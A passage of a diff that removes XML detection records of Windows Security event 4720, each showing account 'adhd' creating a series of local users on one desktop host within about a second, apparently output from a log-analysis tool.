-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Danielle</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4585</recordid>
-            <time>2020-06-11 22:04:59.562873500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:59.5628735Z'/&gt;&lt;EventRecordID&gt;4585&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Frank&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1090&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Frank&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Frank</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4579</recordid>
-            <time>2020-06-11 22:04:59.420807300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:59.4208073Z'/&gt;&lt;EventRecordID&gt;4579&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Mark&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1089&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Mark&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Mark</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4573</recordid>
-            <time>2020-06-11 22:04:59.342815700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:59.3428157Z'/&gt;&lt;EventRecordID&gt;4573&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Gloria&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1088&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Gloria&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Gloria</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4567</recordid>
-            <time>2020-06-11 22:04:59.257908400Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:59.2579084Z'/&gt;&lt;EventRecordID&gt;4567&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Joe&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1087&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Joe&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Joe</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4561</recordid>
-            <time>2020-06-11 22:04:59.178807000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:59.1788070Z'/&gt;&lt;EventRecordID&gt;4561&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Patrick&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1086&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Patrick&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Patrick</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4555</recordid>
-            <time>2020-06-11 22:04:59.35410700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:59.0354107Z'/&gt;&lt;EventRecordID&gt;4555&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Kelly&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1085&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Kelly&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Kelly</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4549</recordid>
-            <time>2020-06-11 22:04:58.948843300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:58.9488433Z'/&gt;&lt;EventRecordID&gt;4549&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Nicole&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1084&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Nicole&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Nicole</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4543</recordid>
-            <time>2020-06-11 22:04:58.859109700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:58.8591097Z'/&gt;&lt;EventRecordID&gt;4543&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Willie&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1083&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Willie&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Willie</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4537</recordid>
-            <time>2020-06-11 22:04:58.779567500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:58.7795675Z'/&gt;&lt;EventRecordID&gt;4537&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Eugene&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1082&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Eugene&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

